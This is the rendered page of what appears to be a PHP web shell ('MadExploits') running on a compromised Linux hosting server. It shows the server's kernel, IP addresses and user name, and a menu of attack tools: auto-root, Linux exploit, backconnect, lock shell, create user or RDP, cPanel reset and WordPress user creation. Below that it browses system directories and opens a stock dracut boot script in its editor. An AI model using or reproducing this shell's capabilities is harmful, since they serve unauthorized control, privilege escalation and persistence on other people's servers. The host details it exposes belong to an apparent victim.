Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.118.210.183
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
dracut /
modules.d /
98systemd /
[ HOME SHELL ]
Name
Size
Permission
Action
dracut-cmdline-ask.service
978
B
-rw-r--r--
dracut-cmdline-ask.sh
422
B
-rwxr-xr-x
dracut-cmdline.service
1.13
KB
-rw-r--r--
dracut-cmdline.service.8
1.52
KB
-rw-r--r--
dracut-cmdline.service.8.asc
442
B
-rw-r--r--
dracut-cmdline.sh
2.65
KB
-rwxr-xr-x
dracut-emergency.service
974
B
-rw-r--r--
dracut-emergency.sh
1.31
KB
-rwxr-xr-x
dracut-initqueue.service
1.37
KB
-rw-r--r--
dracut-initqueue.service.8
1.51
KB
-rw-r--r--
dracut-initqueue.service.8.asc
439
B
-rw-r--r--
dracut-initqueue.sh
2.17
KB
-rwxr-xr-x
dracut-mount.service
1
KB
-rw-r--r--
dracut-mount.service.8
1.49
KB
-rw-r--r--
dracut-mount.service.8.asc
416
B
-rw-r--r--
dracut-mount.sh
1.14
KB
-rwxr-xr-x
dracut-pre-mount.service
1.03
KB
-rw-r--r--
dracut-pre-mount.service.8
1.51
KB
-rw-r--r--
dracut-pre-mount.service.8.asc
434
B
-rw-r--r--
dracut-pre-mount.sh
622
B
-rwxr-xr-x
dracut-pre-pivot.service
1.03
KB
-rw-r--r--
dracut-pre-pivot.service.8
1.5
KB
-rw-r--r--
dracut-pre-pivot.service.8.asc
429
B
-rw-r--r--
dracut-pre-pivot.sh
1.15
KB
-rwxr-xr-x
dracut-pre-trigger.service
1.14
KB
-rw-r--r--
dracut-pre-trigger.service.8
1.51
KB
-rw-r--r--
dracut-pre-trigger.service.8.a...
440
B
-rw-r--r--
dracut-pre-trigger.sh
588
B
-rwxr-xr-x
dracut-pre-udev.service
1.17
KB
-rw-r--r--
dracut-pre-udev.service.8
1.5
KB
-rw-r--r--
dracut-pre-udev.service.8.asc
424
B
-rw-r--r--
dracut-pre-udev.sh
1.49
KB
-rwxr-xr-x
dracut-shutdown.service
677
B
-rw-r--r--
dracut-shutdown.service.8
3.52
KB
-rw-r--r--
dracut-shutdown.service.8.asc
1.65
KB
-rw-r--r--
dracut-tmpfiles.conf
135
B
-rw-r--r--
emergency.service
980
B
-rw-r--r--
initrd.target
247
B
-rw-r--r--
module-setup.sh
9.99
KB
-rwxr-xr-x
rescue.service
877
B
-rw-r--r--
rootfs-generator.sh
3.61
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dracut-cmdline.sh
#!/bin/sh # -*- mode: shell-script; indent-tabs-mode: nil; sh-basic-offset: 4; -*- # ex: ts=8 sw=4 sts=4 et filetype=sh [ -d $NEWROOT ] || mkdir -p -m 0755 $NEWROOT [ -d /run/initramfs ] || mkdir -p -m 0755 /run/initramfs [ -d /run/lock ] || mkdir -p -m 0755 /run/lock [ -d /run/log ] || mkdir -p -m 0755 /run/log if [ -f /dracut-state.sh ]; then . /dracut-state.sh 2>/dev/null fi type getarg >/dev/null 2>&1 || . /lib/dracut-lib.sh [ -f /etc/initrd-release ] && . /etc/initrd-release [ -n "$VERSION" ] && info "dracut-$VERSION" info "Using kernel command line parameters:" $(getcmdline) getargbool 0 rd.udev.log-priority=info -d rd.udev.info -d -n -y rdudevinfo && echo 'udev_log="info"' >> /etc/udev/udev.conf getargbool 0 rd.udev.log-priority=debug -d rd.udev.debug -d -n -y rdudevdebug && echo 'udev_log="debug"' >> /etc/udev/udev.conf source_conf /etc/conf.d # Get the "root=" parameter from the kernel command line, but differentiate # between the case where it was set to the empty string and the case where it # wasn't specified at all. if ! root="$(getarg root=)"; then root_unset='UNSET' fi rflags="$(getarg rootflags=)" getargbool 0 ro && rflags="${rflags},ro" getargbool 0 rw && rflags="${rflags},rw" rflags="${rflags#,}" fstype="$(getarg rootfstype=)" if [ -z "$fstype" ]; then fstype="auto" fi export root export rflags export fstype make_trace_mem "hook cmdline" '1+:mem' '1+:iomem' '3+:slab' '4+:komem' # run scriptlets to parse the command line getarg 'rd.break=cmdline' -d 'rdbreak=cmdline' && emergency_shell -n cmdline "Break before cmdline" source_hook cmdline [ -f /lib/dracut/parse-resume.sh ] && . /lib/dracut/parse-resume.sh case "${root}${root_unset}" in block:LABEL=*|LABEL=*) root="${root#block:}" root="$(echo $root | sed 's,/,\\x2f,g')" root="block:/dev/disk/by-label/${root#LABEL=}" rootok=1 ;; block:UUID=*|UUID=*) root="${root#block:}" root="block:/dev/disk/by-uuid/${root#UUID=}" rootok=1 ;; block:PARTUUID=*|PARTUUID=*) root="${root#block:}" root="block:/dev/disk/by-partuuid/${root#PARTUUID=}" rootok=1 ;; block:PARTLABEL=*|PARTLABEL=*) root="${root#block:}" root="block:/dev/disk/by-partlabel/${root#PARTLABEL=}" rootok=1 ;; /dev/*) root="block:${root}" rootok=1 ;; UNSET|gpt-auto) # systemd's gpt-auto-generator handles this case. rootok=1 ;; esac [ -z "${root}${root_unset}" ] && die "Empty root= argument" [ -z "$rootok" ] && die "Don't know how to handle 'root=$root'" [ "$root" = "UNSET" ] && unset root export root rflags fstype netroot NEWROOT export -p > /dracut-state.sh exit 0
Close